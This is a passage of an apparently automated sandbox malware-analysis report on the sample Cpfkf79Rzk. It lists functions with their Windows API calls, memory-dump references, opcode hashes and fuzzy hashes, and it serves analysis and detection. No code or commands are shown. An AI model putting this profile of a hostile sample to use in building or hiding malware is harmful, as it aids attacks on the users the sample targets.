                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                        • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                                                        • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                        • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                                                        Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree
                                                                                                        • String ID: Polystichoid
                                                                                                        • API String ID: 3394109436-2603710711
                                                                                                        • Opcode ID: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
                                                                                                        • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                                                                        • Opcode Fuzzy Hash: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
                                                                                                        • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                                                                        Function 00401F8C Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                          • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000009,00000000,?,000000EE), ref: 00401FA2
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FC1
                                                                                                          • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2520467145-0
                                                                                                        • Opcode ID: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
                                                                                                        • Instruction ID: 280eb5e8334f411f39d8c2fef6e633d2853c014e7ace8d4ea398df577ea4e561
                                                                                                        • Opcode Fuzzy Hash: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
                                                                                                        • Instruction Fuzzy Hash: A7114A71A00208BFDB01AFA5DD89E9EBBB5EF44314F11402AF505F62A1EB768951DB28
                                                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                                        • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                                                        • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                                        • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                                                        Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2831762973-0
                                                                                                        • Opcode ID: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
                                                                                                        • Instruction ID: c64e159aaddbf3301d14cafd97046592125c01172a1cc8aad3b5dad300b5ea2c
                                                                                                        • Opcode Fuzzy Hash: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
                                                                                                        • Instruction Fuzzy Hash: 2FF0FC32E041109BE700BBA49B8DABE72A49B44314F25003FFE02F31C1C9F84D41576D
                                                                                                        Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ShowWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1268545403-0
                                                                                                        • Opcode ID: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
                                                                                                        • Instruction ID: 5a19d233efad038c8b2c136f8d26bdd3a0ec8095e28a03ee1255231ebf4f6cbd
                                                                                                        • Opcode Fuzzy Hash: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
                                                                                                        • Instruction Fuzzy Hash: 35E04F36B10105ABCB24CBA4ED848AE77A5AB88310764057BE502B32A0CA75AD51CF78
                                                                                                        Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                          • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                          • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                                                          • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2547128583-0
                                                                                                        • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                        • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                                                        • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                        • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                                                        Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 415043291-0
                                                                                                        • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                        • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                        • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                        • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                        Function 00405D55 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                        • Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
                                                                                                        • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                        • Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98
                                                                                                        Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1375471231-0
                                                                                                        • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                        • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                                                        • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                        • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                                                        Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 390214022-0
                                                                                                        • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                        • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                                        • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                        • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                                        Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                        • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                                                        • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                        • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                                                        Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
